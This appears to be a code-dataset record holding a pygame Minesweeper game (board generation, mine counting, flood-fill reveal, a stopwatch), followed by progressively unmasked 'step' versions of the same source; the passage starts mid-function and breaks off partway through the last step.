if board[x - 1][y - 1][0] == MINE:
mines += 1
if board[x - 1][y][0] == MINE:
mines += 1
if y < GRID_HEIGHT - 1:
if board[x - 1][y + 1][0] == MINE:
mines += 1
if x < GRID_WIDTH - 1:
if y > 0: # If not on right edge AND not on top edge
if board[x + 1][y - 1][0] == MINE:
mines += 1
if board[x + 1][y][0] == MINE:
mines += 1
if y < GRID_HEIGHT - 1:
if board[x + 1][y + 1][0] == MINE:
mines += 1
if y > 0: # If not on right or left edge AND not on top edge
if board[x][y - 1][0] == MINE:
mines += 1
if y < GRID_HEIGHT - 1: # If not on riht or left edge AND on bottom edge
if board[x][y + 1][0] == MINE:
mines += 1
# If the cell is clear and there are mines around it, add the number of mines to board array
if board[x][y][0] != MINE:
if mines in range(1, 9):
board[x][y] = (str(mines), WHITE)
return board
# Used to show full board on game over & reset board on game start
@staticmethod
def generate_data(val):
clear = []
for i in range(GRID_WIDTH):
clear.append([val] * GRID_HEIGHT)
return clear
# Convert row, column coordinates into x, y pixel coordinates (for drawing shapes)
@staticmethod
def get_top_left_coordinates(row, column):
left = row * (CELL_SIDE_LENGTH + CELL_MARGIN) + X_BOARD_MARGIN
top = column * (CELL_SIDE_LENGTH + CELL_MARGIN) + Y_BOARD_MARGIN
return left, top
# Convert x, y pixel coordinates to row, column coordinates (for mouse hovering)
def get_cell_at_pixel(self, x, y):
for cell_x in range(GRID_WIDTH):
for cell_y in range(GRID_HEIGHT):
left, top = self.get_top_left_coordinates(cell_x, cell_y)
cell_rect = pygame.Rect(left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH)
if cell_rect.collidepoint(x, y): # If currently hovering over a cell
return cell_x, cell_y
return None, None # If not currently hovering over a cell
# Redraws board after mouse event
def draw_board(self, board, revealed, flags, questionmarks):
for cell_x in range(GRID_WIDTH):
for cell_y in range(GRID_HEIGHT):
left, top = self.get_top_left_coordinates(cell_x, cell_y)
# Symbols not added on board creation must be drawn here: "unrevealed" boxes, flags, and question marks
if not revealed[cell_x][cell_y]:
# Draw a gray box over unrevealed cell, so value isn't affected but user can't see the value
pygame.draw.rect(SURFACE, CELL_COLOR, (left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))
if flags[cell_x][cell_y]:
half = int(CELL_SIDE_LENGTH * 0.5) # Relative point halfway through cell
# top point, bottom left point, bottom right point
pygame.draw.polygon(SURFACE, FLAG_COLOR, [(half + left, top),
(left, top + CELL_SIDE_LENGTH - CELL_MARGIN/2),
(left + CELL_SIDE_LENGTH - CELL_MARGIN/2, top +
CELL_SIDE_LENGTH - CELL_MARGIN/2)])
elif questionmarks[cell_x][cell_y]:
quarter = int(CELL_SIDE_LENGTH * 0.25)
pygame.draw.rect(SURFACE, GRAY, (left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))
fontsize = int(CELL_SIDE_LENGTH)
font = pygame.font.SysFont("times new roman", fontsize)
label = font.render("?", 1, BLACK)
SURFACE.blit(label, (left + quarter, top))
else: # Draw revealed cells
shape, color = self.get_shape_and_color(board, cell_x, cell_y)
self.draw_icon(shape, color, cell_x, cell_y)
# Draws icon passed to it in the stated cell
def draw_icon(self, shape, color, cell_x, cell_y):
# Relative point of quarter-way through cell
quarter = int(CELL_SIDE_LENGTH * 0.25)
left, top = self.get_top_left_coordinates(cell_x, cell_y) # Drawing of all images starts at top left corner
# Draw the shapes
if shape == CLEAR:
pygame.draw.rect(SURFACE, color, (left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))
elif shape == MINE:
pygame.draw.ellipse(SURFACE, color, (left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))
# Flag shape & question mark in draw_board because they are activated via mouse event
else: # Clear with num
pygame.draw.rect(SURFACE, color, (left, top, CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))
fontsize = int(CELL_SIDE_LENGTH)
font = pygame.font.SysFont("times new roman", fontsize)
label = font.render(shape, 1, BLACK) # a cell with number corresponds to shapes "1", "2", etc.
SURFACE.blit(label, (left + quarter, top))
# Returns the shape and color of icon to be created in draw_icon method
@staticmethod
def get_shape_and_color(board, cell_x, cell_y):
# shape value for cell x, y is stored in board[x][y][0], color value in board[x][y][1]
return board[cell_x][cell_y][0], board[cell_x][cell_y][1]
# Draws a box around the cell the mouse is hovering over, 'highlighting' it
def highlight_cell(self, cell_x, cell_y):
left, top = self.get_top_left_coordinates(cell_x, cell_y)
# Changes with cell size, but line width is hard-set at 2px (last argument)
pygame.draw.rect(SURFACE, HIGHLIGHT_COLOR, (left - (CELL_MARGIN / 2), top - (CELL_MARGIN / 2),
CELL_SIDE_LENGTH + CELL_MARGIN, CELL_SIDE_LENGTH + CELL_MARGIN), 2)
# Reveals clear cells next to clear cell the user clicked (and clear cells next to those cells, etc.)
def reveal_cells(self, x, y, board, revealed, flags, questionmarks):
if revealed[x][y]: # If the cell is already revealed, do nothing
return
if flags[x][y]: # If the cell already has a flag on it, do nothing
return
revealed[x][y] = True
if board[x][y][0] != CLEAR:
return
if x > 0:
if y > 0:
self.reveal_cells(x - 1, y - 1, board, revealed, flags, questionmarks)
self.reveal_cells(x - 1, y, board, revealed, flags, questionmarks)
if y < GRID_HEIGHT - 1:
self.reveal_cells(x - 1, y + 1, board, revealed, flags, questionmarks)
if x < GRID_WIDTH - 1:
if y > 0:
self.reveal_cells(x + 1, y - 1, board, revealed, flags, questionmarks)
self.reveal_cells(x + 1, y, board, revealed, flags, questionmarks)
if y < GRID_HEIGHT - 1:
self.reveal_cells(x + 1, y + 1, board, revealed, flags, questionmarks)
if y > 0:
self.reveal_cells(x, y - 1, board, revealed, flags, questionmarks)
if y < GRID_HEIGHT - 1:
self.reveal_cells(x, y + 1, board, revealed, flags, questionmarks)
@staticmethod
def create_menu():
font = pygame.font.SysFont("times new roman", 20)
label = font.render(" High scores", 1, BLACK)
pygame.draw.rect(SURFACE, GRAY, (500, 125, 105, 50)) # view high scores
SURFACE.blit(label, (500, 135))
class Stopwatch:
def __init__(self):
self.seconds = 0
self.running = False
self.latest_time = None
def start(self):
if not self.running:
self.running = True
self.latest_time = time.time()
def get_seconds(self):
t1 = self.seconds
if self.running:
t1 += time.time() - self.latest_time
return int(t1)
def pause(self):
if self.running:
self.running = False
self.seconds += time.time() - self.latest_time
g = Game()
g.main()
|
normal
|
{
"blob_id": "030bc0c7bdbbb09f722ffe4c82866726062f5317",
"index": 1962,
"step-1": "<mask token>\n\n\nclass Game:\n\n def __init__(self):\n pygame.init()\n global CLOCK, SURFACE\n CLOCK = pygame.time.Clock()\n SURFACE = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))\n self.mouse_x = 0\n self.mouse_y = 0\n pygame.display.set_caption('Minesweeper by Alyssa Moore 2017')\n self.board = self.get_board()\n self.revealed_cells = self.generate_data(False)\n self.flags = self.generate_data(False)\n self.questionmarks = self.generate_data(False)\n self.game_over = False\n self.timer = Stopwatch()\n SURFACE.fill(BG_COLOR)\n <mask token>\n <mask token>\n\n @staticmethod\n def generate_data(val):\n clear = []\n for i in range(GRID_WIDTH):\n clear.append([val] * GRID_HEIGHT)\n return clear\n <mask token>\n <mask token>\n\n def draw_board(self, board, revealed, flags, questionmarks):\n for cell_x in range(GRID_WIDTH):\n for cell_y in range(GRID_HEIGHT):\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n if not revealed[cell_x][cell_y]:\n pygame.draw.rect(SURFACE, CELL_COLOR, (left, top,\n CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n if flags[cell_x][cell_y]:\n half = int(CELL_SIDE_LENGTH * 0.5)\n pygame.draw.polygon(SURFACE, FLAG_COLOR, [(half +\n left, top), (left, top + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2), (left + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2, top + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2)])\n elif questionmarks[cell_x][cell_y]:\n quarter = int(CELL_SIDE_LENGTH * 0.25)\n pygame.draw.rect(SURFACE, GRAY, (left, top,\n CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n fontsize = int(CELL_SIDE_LENGTH)\n font = pygame.font.SysFont('times new roman', fontsize)\n label = font.render('?', 1, BLACK)\n SURFACE.blit(label, (left + quarter, top))\n else:\n shape, color = self.get_shape_and_color(board, cell_x,\n cell_y)\n self.draw_icon(shape, color, cell_x, cell_y)\n <mask token>\n\n @staticmethod\n def get_shape_and_color(board, cell_x, cell_y):\n return board[cell_x][cell_y][0], board[cell_x][cell_y][1]\n <mask token>\n <mask token>\n <mask token>\n\n\nclass Stopwatch:\n\n def __init__(self):\n self.seconds = 0\n self.running = False\n self.latest_time = None\n\n def start(self):\n if not self.running:\n self.running = True\n self.latest_time = time.time()\n\n def get_seconds(self):\n t1 = self.seconds\n if self.running:\n t1 += time.time() - self.latest_time\n return int(t1)\n\n def pause(self):\n if self.running:\n self.running = False\n self.seconds += time.time() - self.latest_time\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Game:\n\n def __init__(self):\n pygame.init()\n global CLOCK, SURFACE\n CLOCK = pygame.time.Clock()\n SURFACE = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))\n self.mouse_x = 0\n self.mouse_y = 0\n pygame.display.set_caption('Minesweeper by Alyssa Moore 2017')\n self.board = self.get_board()\n self.revealed_cells = self.generate_data(False)\n self.flags = self.generate_data(False)\n self.questionmarks = self.generate_data(False)\n self.game_over = False\n self.timer = Stopwatch()\n SURFACE.fill(BG_COLOR)\n <mask token>\n\n @staticmethod\n def get_board():\n icons = []\n mines = 0\n for x in range(GRID_WIDTH):\n for y in range(GRID_HEIGHT):\n if mines < NUM_MINES:\n icons.append((MINE, RED))\n mines += 1\n else:\n icons.append((CLEAR, WHITE))\n random.shuffle(icons)\n board = []\n for x in range(GRID_WIDTH):\n column = []\n for y in range(GRID_HEIGHT):\n column.append(icons[0])\n del icons[0]\n board.append(column)\n for x in range(GRID_WIDTH):\n for y in range(GRID_HEIGHT):\n mines = 0\n if x > 0:\n if y > 0:\n if board[x - 1][y - 1][0] == MINE:\n mines += 1\n if board[x - 1][y][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x - 1][y + 1][0] == MINE:\n mines += 1\n if x < GRID_WIDTH - 1:\n if y > 0:\n if board[x + 1][y - 1][0] == MINE:\n mines += 1\n if board[x + 1][y][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x + 1][y + 1][0] == MINE:\n mines += 1\n if y > 0:\n if board[x][y - 1][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x][y + 1][0] == MINE:\n mines += 1\n if board[x][y][0] != MINE:\n if mines in range(1, 9):\n board[x][y] = str(mines), WHITE\n return board\n\n @staticmethod\n def generate_data(val):\n clear = []\n for i in range(GRID_WIDTH):\n clear.append([val] * GRID_HEIGHT)\n return clear\n\n @staticmethod\n def get_top_left_coordinates(row, column):\n left = row * (CELL_SIDE_LENGTH + CELL_MARGIN) + X_BOARD_MARGIN\n top = column * (CELL_SIDE_LENGTH + CELL_MARGIN) + Y_BOARD_MARGIN\n return left, top\n\n def get_cell_at_pixel(self, x, y):\n for cell_x in range(GRID_WIDTH):\n for cell_y in range(GRID_HEIGHT):\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n cell_rect = pygame.Rect(left, top, CELL_SIDE_LENGTH,\n CELL_SIDE_LENGTH)\n if cell_rect.collidepoint(x, y):\n return cell_x, cell_y\n return None, None\n\n def draw_board(self, board, revealed, flags, questionmarks):\n for cell_x in range(GRID_WIDTH):\n for cell_y in range(GRID_HEIGHT):\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n if not revealed[cell_x][cell_y]:\n pygame.draw.rect(SURFACE, CELL_COLOR, (left, top,\n CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n if flags[cell_x][cell_y]:\n half = int(CELL_SIDE_LENGTH * 0.5)\n pygame.draw.polygon(SURFACE, FLAG_COLOR, [(half +\n left, top), (left, top + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2), (left + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2, top + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2)])\n elif questionmarks[cell_x][cell_y]:\n quarter = int(CELL_SIDE_LENGTH * 0.25)\n pygame.draw.rect(SURFACE, GRAY, (left, top,\n CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n fontsize = int(CELL_SIDE_LENGTH)\n font = pygame.font.SysFont('times new roman', fontsize)\n label = font.render('?', 1, BLACK)\n SURFACE.blit(label, (left + quarter, top))\n else:\n shape, color = self.get_shape_and_color(board, cell_x,\n cell_y)\n self.draw_icon(shape, color, cell_x, cell_y)\n\n def draw_icon(self, shape, color, cell_x, cell_y):\n quarter = int(CELL_SIDE_LENGTH * 0.25)\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n if shape == CLEAR:\n pygame.draw.rect(SURFACE, color, (left, top, CELL_SIDE_LENGTH,\n CELL_SIDE_LENGTH))\n elif shape == MINE:\n pygame.draw.ellipse(SURFACE, color, (left, top,\n CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n else:\n pygame.draw.rect(SURFACE, color, (left, top, CELL_SIDE_LENGTH,\n CELL_SIDE_LENGTH))\n fontsize = int(CELL_SIDE_LENGTH)\n font = pygame.font.SysFont('times new roman', fontsize)\n label = font.render(shape, 1, BLACK)\n SURFACE.blit(label, (left + quarter, top))\n\n @staticmethod\n def get_shape_and_color(board, cell_x, cell_y):\n return board[cell_x][cell_y][0], board[cell_x][cell_y][1]\n <mask token>\n\n def reveal_cells(self, x, y, board, revealed, flags, questionmarks):\n if revealed[x][y]:\n return\n if flags[x][y]:\n return\n revealed[x][y] = True\n if board[x][y][0] != CLEAR:\n return\n if x > 0:\n if y > 0:\n self.reveal_cells(x - 1, y - 1, board, revealed, flags,\n questionmarks)\n self.reveal_cells(x - 1, y, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x - 1, y + 1, board, revealed, flags,\n questionmarks)\n if x < GRID_WIDTH - 1:\n if y > 0:\n self.reveal_cells(x + 1, y - 1, board, revealed, flags,\n questionmarks)\n self.reveal_cells(x + 1, y, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x + 1, y + 1, board, revealed, flags,\n questionmarks)\n if y > 0:\n self.reveal_cells(x, y - 1, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x, y + 1, board, revealed, flags, questionmarks)\n\n @staticmethod\n def create_menu():\n font = pygame.font.SysFont('times new roman', 20)\n label = font.render(' High scores', 1, BLACK)\n pygame.draw.rect(SURFACE, GRAY, (500, 125, 105, 50))\n SURFACE.blit(label, (500, 135))\n\n\nclass Stopwatch:\n\n def __init__(self):\n self.seconds = 0\n self.running = False\n self.latest_time = None\n\n def start(self):\n if not self.running:\n self.running = True\n self.latest_time = time.time()\n\n def get_seconds(self):\n t1 = self.seconds\n if self.running:\n t1 += time.time() - self.latest_time\n return int(t1)\n\n def pause(self):\n if self.running:\n self.running = False\n self.seconds += time.time() - self.latest_time\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Game:\n\n def __init__(self):\n pygame.init()\n global CLOCK, SURFACE\n CLOCK = pygame.time.Clock()\n SURFACE = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))\n self.mouse_x = 0\n self.mouse_y = 0\n pygame.display.set_caption('Minesweeper by Alyssa Moore 2017')\n self.board = self.get_board()\n self.revealed_cells = self.generate_data(False)\n self.flags = self.generate_data(False)\n self.questionmarks = self.generate_data(False)\n self.game_over = False\n self.timer = Stopwatch()\n SURFACE.fill(BG_COLOR)\n\n def main(self):\n while True:\n left_click = False\n right_click = False\n SURFACE.fill(BG_COLOR)\n self.draw_board(self.board, self.revealed_cells, self.flags,\n self.questionmarks)\n self.create_menu()\n font = pygame.font.SysFont('times new roman', 25)\n self.timer.start()\n t1 = self.timer.get_seconds()\n label = font.render(str(t1), 1, MAGENTA)\n SURFACE.blit(label, (50, 50))\n for event in pygame.event.get():\n if event.type == pygame.locals.QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == pygame.locals.MOUSEMOTION:\n self.mouse_x, self.mouse_y = event.pos\n elif event.type == pygame.locals.MOUSEBUTTONDOWN and event.button == 1:\n self.mouse_x, self.mouse_y = event.pos\n print(self.mouse_x, self.mouse_y)\n left_click = True\n elif event.type == pygame.locals.MOUSEBUTTONDOWN and event.button == 3:\n self.mouse_x, self.mouse_y = event.pos\n right_click = True\n if self.game_over and right_click:\n self.board = self.get_board()\n self.revealed_cells = self.generate_data(False)\n self.flags = self.generate_data(False)\n self.questionmarks = self.generate_data(False)\n self.game_over = False\n self.timer = Stopwatch()\n right_click = False\n if self.game_over:\n self.timer.pause()\n score = self.timer.get_seconds()\n a_x = X_BOARD_MARGIN + GRID_WIDTH / 4 * CELL_SIDE_LENGTH\n b_y = (Y_BOARD_MARGIN + Y_BOARD_MARGIN / 4 + GRID_HEIGHT *\n CELL_SIDE_LENGTH + GRID_HEIGHT * CELL_MARGIN)\n font = pygame.font.SysFont('times new roman', 25)\n if win:\n label = font.render('Congratulations, you won!', 1, GREEN)\n SURFACE.blit(label, (a_x - 75, b_y))\n label = font.render('Score: ' + str(score), 1, GREEN)\n SURFACE.blit(label, (a_x + 200, b_y))\n else:\n label = font.render('GAME OVER', 1, RED)\n SURFACE.blit(label, (a_x + 10, b_y))\n label = font.render('Press RIGHT mouse button', 1, YELLOW)\n SURFACE.blit(label, (a_x - 50, b_y + 25))\n cell_x, cell_y = self.get_cell_at_pixel(self.mouse_x, self.mouse_y)\n if cell_x is not None and cell_y is not None:\n if not self.revealed_cells[cell_x][cell_y\n ] and not self.game_over:\n self.highlight_cell(cell_x, cell_y)\n if not self.revealed_cells[cell_x][cell_y\n ] and left_click and not self.game_over:\n if not self.flags[cell_x][cell_y\n ] and not self.questionmarks[cell_x][cell_y]:\n self.flags[cell_x][cell_y] = False\n if self.board[cell_x][cell_y][0] == MINE:\n self.revealed_cells = self.generate_data(True)\n self.game_over = True\n elif self.board[cell_x][cell_y][0] == CLEAR:\n self.reveal_cells(cell_x, cell_y, self.board,\n self.revealed_cells, self.flags, self.\n questionmarks)\n else:\n self.revealed_cells[cell_x][cell_y] = True\n self.draw_board(self.board, self.revealed_cells,\n self.flags, self.questionmarks)\n if not self.revealed_cells[cell_x][cell_y\n ] and right_click and not self.game_over:\n if self.flags[cell_x][cell_y]:\n self.flags[cell_x][cell_y] = False\n self.questionmarks[cell_x][cell_y] = True\n elif self.questionmarks[cell_x][cell_y]:\n self.questionmarks[cell_x][cell_y] = False\n self.flags[cell_x][cell_y] = False\n else:\n self.flags[cell_x][cell_y] = True\n self.questionmarks[cell_x][cell_y] = False\n self.draw_board(self.board, self.revealed_cells, self.\n flags, self.questionmarks)\n win = True\n for x in range(GRID_WIDTH):\n for y in range(GRID_HEIGHT):\n if self.board[x][y][0] == MINE and not self.flags[x][y\n ] or self.board[x][y][0\n ] != MINE and not self.revealed_cells[x][y]:\n win = False\n if win:\n self.game_over = True\n pygame.display.update()\n CLOCK.tick(FPS)\n\n @staticmethod\n def get_board():\n icons = []\n mines = 0\n for x in range(GRID_WIDTH):\n for y in range(GRID_HEIGHT):\n if mines < NUM_MINES:\n icons.append((MINE, RED))\n mines += 1\n else:\n icons.append((CLEAR, WHITE))\n random.shuffle(icons)\n board = []\n for x in range(GRID_WIDTH):\n column = []\n for y in range(GRID_HEIGHT):\n column.append(icons[0])\n del icons[0]\n board.append(column)\n for x in range(GRID_WIDTH):\n for y in range(GRID_HEIGHT):\n mines = 0\n if x > 0:\n if y > 0:\n if board[x - 1][y - 1][0] == MINE:\n mines += 1\n if board[x - 1][y][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x - 1][y + 1][0] == MINE:\n mines += 1\n if x < GRID_WIDTH - 1:\n if y > 0:\n if board[x + 1][y - 1][0] == MINE:\n mines += 1\n if board[x + 1][y][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x + 1][y + 1][0] == MINE:\n mines += 1\n if y > 0:\n if board[x][y - 1][0] == MINE:\n mines += 1\n if y < GRID_HEIGHT - 1:\n if board[x][y + 1][0] == MINE:\n mines += 1\n if board[x][y][0] != MINE:\n if mines in range(1, 9):\n board[x][y] = str(mines), WHITE\n return board\n\n @staticmethod\n def generate_data(val):\n clear = []\n for i in range(GRID_WIDTH):\n clear.append([val] * GRID_HEIGHT)\n return clear\n\n @staticmethod\n def get_top_left_coordinates(row, column):\n left = row * (CELL_SIDE_LENGTH + CELL_MARGIN) + X_BOARD_MARGIN\n top = column * (CELL_SIDE_LENGTH + CELL_MARGIN) + Y_BOARD_MARGIN\n return left, top\n\n def get_cell_at_pixel(self, x, y):\n for cell_x in range(GRID_WIDTH):\n for cell_y in range(GRID_HEIGHT):\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n cell_rect = pygame.Rect(left, top, CELL_SIDE_LENGTH,\n CELL_SIDE_LENGTH)\n if cell_rect.collidepoint(x, y):\n return cell_x, cell_y\n return None, None\n\n def draw_board(self, board, revealed, flags, questionmarks):\n for cell_x in range(GRID_WIDTH):\n for cell_y in range(GRID_HEIGHT):\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n if not revealed[cell_x][cell_y]:\n pygame.draw.rect(SURFACE, CELL_COLOR, (left, top,\n CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n if flags[cell_x][cell_y]:\n half = int(CELL_SIDE_LENGTH * 0.5)\n pygame.draw.polygon(SURFACE, FLAG_COLOR, [(half +\n left, top), (left, top + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2), (left + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2, top + CELL_SIDE_LENGTH - \n CELL_MARGIN / 2)])\n elif questionmarks[cell_x][cell_y]:\n quarter = int(CELL_SIDE_LENGTH * 0.25)\n pygame.draw.rect(SURFACE, GRAY, (left, top,\n CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n fontsize = int(CELL_SIDE_LENGTH)\n font = pygame.font.SysFont('times new roman', fontsize)\n label = font.render('?', 1, BLACK)\n SURFACE.blit(label, (left + quarter, top))\n else:\n shape, color = self.get_shape_and_color(board, cell_x,\n cell_y)\n self.draw_icon(shape, color, cell_x, cell_y)\n\n def draw_icon(self, shape, color, cell_x, cell_y):\n quarter = int(CELL_SIDE_LENGTH * 0.25)\n left, top = self.get_top_left_coordinates(cell_x, cell_y)\n if shape == CLEAR:\n pygame.draw.rect(SURFACE, color, (left, top, CELL_SIDE_LENGTH,\n CELL_SIDE_LENGTH))\n elif shape == MINE:\n pygame.draw.ellipse(SURFACE, color, (left, top,\n CELL_SIDE_LENGTH, CELL_SIDE_LENGTH))\n else:\n pygame.draw.rect(SURFACE, color, (left, top, CELL_SIDE_LENGTH,\n CELL_SIDE_LENGTH))\n fontsize = int(CELL_SIDE_LENGTH)\n font = pygame.font.SysFont('times new roman', fontsize)\n label = font.render(shape, 1, BLACK)\n SURFACE.blit(label, (left + quarter, top))\n\n @staticmethod\n def get_shape_and_color(board, cell_x, cell_y):\n return board[cell_x][cell_y][0], board[cell_x][cell_y][1]\n <mask token>\n\n def reveal_cells(self, x, y, board, revealed, flags, questionmarks):\n if revealed[x][y]:\n return\n if flags[x][y]:\n return\n revealed[x][y] = True\n if board[x][y][0] != CLEAR:\n return\n if x > 0:\n if y > 0:\n self.reveal_cells(x - 1, y - 1, board, revealed, flags,\n questionmarks)\n self.reveal_cells(x - 1, y, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x - 1, y + 1, board, revealed, flags,\n questionmarks)\n if x < GRID_WIDTH - 1:\n if y > 0:\n self.reveal_cells(x + 1, y - 1, board, revealed, flags,\n questionmarks)\n self.reveal_cells(x + 1, y, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x + 1, y + 1, board, revealed, flags,\n questionmarks)\n if y > 0:\n self.reveal_cells(x, y - 1, board, revealed, flags, questionmarks)\n if y < GRID_HEIGHT - 1:\n self.reveal_cells(x, y + 1, board, revealed, flags, questionmarks)\n\n @staticmethod\n def create_menu():\n font = pygame.font.SysFont('times new roman', 20)\n label = font.render(' High scores', 1, BLACK)\n pygame.draw.rect(SURFACE, GRAY, (500, 125, 105, 50))\n SURFACE.blit(label, (500, 135))\n\n\nclass Stopwatch:\n\n def __init__(self):\n self.seconds = 0\n self.running = False\n self.latest_time = None\n\n def start(self):\n if not self.running:\n self.running = True\n self.latest_time = time.time()\n\n def get_seconds(self):\n t1 = self.seconds\n if self.running:\n t1 += time.time() - self.latest_time\n return int(t1)\n\n def pause(self):\n if self.running:\n self.running = False\n self.seconds += time.time() - self.latest_time\n\n\n<mask token>\n",
"step-4": "import sys\nimport random\nimport pygame\nimport pygame.locals\nimport time\nCELL_SIDE_LENGTH = 40\nCELL_MARGIN = 2\nGRID_HEIGHT = 10\nGRID_WIDTH = 10\nX_BOARD_MARGIN = 50\nY_BOARD_MARGIN = 75\nMENU_MARGIN = 100\nDIFFICULTY = 0.1\nFPS = 30\nNUM_MINES = 1 + int(GRID_WIDTH * GRID_HEIGHT * DIFFICULTY)\nWINDOW_HEIGHT = (CELL_SIDE_LENGTH * GRID_HEIGHT + CELL_MARGIN * GRID_HEIGHT +\n Y_BOARD_MARGIN * 2)\nWINDOW_WIDTH = (CELL_SIDE_LENGTH * GRID_WIDTH + CELL_MARGIN * GRID_WIDTH + \n X_BOARD_MARGIN * 2 + MENU_MARGIN)\nRED = 255, 0, 0\nYELLOW = 255, 255, 0\nGREEN = 0, 255, 0\nMIDGREEN = 40, 190, 40\nCYAN = 0, 255, 255\nBLUE = 0, 0, 255\nDARKBLUE = 20, 20, 60\nMAGENTA = 255, 0, 255\nBLACK = 0, 0, 0\nWHITE = 255, 255, 255\nGRAY = 200, 200, 200\nBG_COLOR = DARKBLUE\nCELL_COLOR = GRAY\nHIGHLIGHT_COLOR = CYAN\nFLAG_COLOR = MIDGREEN\nFLAG = 'flag'\nMINE = 'mine'\nCLEAR = 'clear'\n\n\nclass Game:\n\n def __init__(self):\n pygame.init()\n global CLOCK, SURFACE\n CLOCK = pygame.time.Clock()\n SURFACE = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))\n self.mouse_x = 0\n self.mouse_y = 0\n pygame.display.set_caption('Minesweeper by Alyssa Moore 2017')\n self.board = self.get_board()\n self.revealed_cells = self.generate_data(False)\n self.flags = self.generate_data(False)\n self.questionmarks = self.generate_data(False)\n self.game_over = False\n self.timer = Stopwatch()\n SURFACE.fill(BG_COLOR)\n\n def main(self):\n while True:\n left_click = False\n right_click = False\n SURFACE.fill(BG_COLOR)\n self.draw_board(self.board, self.revealed_cells, self.flags,\n self.questionmarks)\n self.create_menu()\n font = pygame.font.SysFont('times new roman', 25)\n self.timer.start()\n t1 = self.timer.get_seconds()\n label = font.render(str(t1), 1, MAGENTA)\n SURFACE.blit(label, (50, 50))\n for event in pygame.event.get():\n if event.type == pygame.locals.QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == pygame.locals.MOUSEMOTION:\n self.mouse_x, self.mouse_y = event.pos\n elif event.type == pygame.locals.MOUSEBUTTONDOWN and event.button == 1:\n self.mouse_x, self.mouse_y = event.pos\n print(self.mouse_x, self.mouse_y)\n left_click = True\n elif event.type == pygame.locals.MOUSEBUTTONDOWN and event.button == 3:\n self.mouse_x, self.mouse_y = event.pos\n right_click = True\n if self.game_over and right_click:\n self.board = self.get_board()\n self.revealed_cells = self.generate_data(False)\n self.flags = self.generate_data(False)\n self.questionmarks = self.generate_data(False)\n self.game_over = False\n self.timer = Stopwatch()\n right_click = False\n if self.game_over:\n self.timer.pause()\n score = self.timer.get_seconds()\n a_x = X_BOARD_MARGIN + GRID_WIDTH / 4 * CELL_SIDE_LENGTH\n b_y = (Y_BOARD_MARGIN + Y_BOARD_MARGIN / 4 + GRID_HEIGHT *\n CELL_SIDE_LENGTH + GRID_HEIGHT * CELL_MARGIN)\n font = pygame.font.SysFont('times new roman', 25)\n if win:\n label = font.render('Congratulations, you won!', 1, GREEN)\n SURFACE.blit(label, (a_x - 75, b_y))\n label = font.render('Score: ' + str(score), 1, GREEN)\n SURFACE.blit(label, (a_x + 200, b_y))\n else:\n label = font.render('GAME OVER', 1, RED)\n SURFACE.blit(label, (a_x + 10, b_y))\n label = font.render('Press RIGHT mouse button', 1, YELLOW)\n SURFACE.blit(label, (a_x - 50, b_y + 25))\n cell_x, cell_y = self.get_cell_at_pixel(self.mouse_x, self.mouse_y)\n if cell_x is not None and cell_y is not None:\n if not self.revealed_cells[cell_x][cell_y\n ] and not self.game_over:\n self.highlight_cell(cell_x, cell_y)\n if not self.revealed_cells[cell_x][cell_y\n ] and left_click and not self.game_over:\n if not self.flags[cell_x][cell_y\n ] and not self.questionmarks[cell_x][cell_y]:\n self.flags[cell_x][cell_y] = False\n if self.board[cell_x][cell_y][0] == MINE:\n self.revealed_cells = self.generate_data(True)\n self.game_over = True\n elif self.board[cell_x][cell_y][0] == CLEAR:\n self.reveal_cells(cell_x, cell_y, self.board,\n self.revealed_cells, self.flags, self.\n questionmarks)\n else:\n self.revealed_cells[cell_x][cell_y] = True\n self.draw_board(self.board, self.revealed_cells,\n self.flags, self.questionmarks)\n if not self.revealed_cells[cell_x][cell_y\n ] and right_click and not self.game_over:\n if self.flags[cell_x][cell_y]:\n self.flags[cell_x][cell_y] = False\n self.questionmarks[cell_x][cell_y] = True\n 